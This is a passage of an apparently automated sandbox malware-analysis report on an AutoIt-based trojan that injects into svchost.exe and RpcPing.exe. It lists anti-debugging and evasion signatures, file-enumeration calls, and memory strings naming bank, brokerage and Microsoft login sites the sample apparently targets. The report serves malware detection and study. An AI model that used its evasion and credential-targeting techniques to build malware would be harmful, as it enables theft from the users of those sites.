            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007733C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeAPI/Special instruction interceptor: Address: 36C3234
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99290
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 6684Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BC93C FindFirstFileW,FindClose,0_2_007BC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBF27
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose,9_2_02C9C400
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose,9_2_02C9C536
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00754AFE
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 45570IH2.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 45570IH2.9.drBinary or memory string: discord.comVMware20,11696487552f
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PasswordVMware20
            Source: 45570IH2.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169648
            Source: 45570IH2.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 45570IH2.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /profileVMware20W
            Source: 45570IH2.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: DUipWAeQLm.exe, 0000000A.00000002.3338852001.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: 45570IH2.9.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: firefox.exe, 0000000B.00000002.3126320701.000001E336EFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 45570IH2.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 45570IH2.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 45570IH2.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,F
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11
            Source: 45570IH2.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20
            Source: 45570IH2.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 45570IH2.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 45570IH2.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 45570IH2.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,116,
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 45570IH2.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,1z
            Source: 45570IH2.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 45570IH2.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 45570IH2.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware
            Source: 45570IH2.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 45570IH2.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeAPI call chain: ExitProcess graph end nodegraph_0-97906
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeAPI call chain: ExitProcess graph end nodegraph_0-97978
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CC3 LdrLoadDll,2_2_00417CC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C41FD BlockInput,0_2_007C41FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00785CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00785CCC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007CC304 LoadLibraryA,GetProcAddress,0_2_007CC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_036C3500 mov eax, dword ptr fs:[00000030h]0_2_036C3500
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_036C34A0 mov eax, dword ptr fs:[00000030h]0_2_036C34A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_036C1E70 mov eax, dword ptr fs:[00000030h]0_2_036C1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h]2_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h]2_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h]2_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
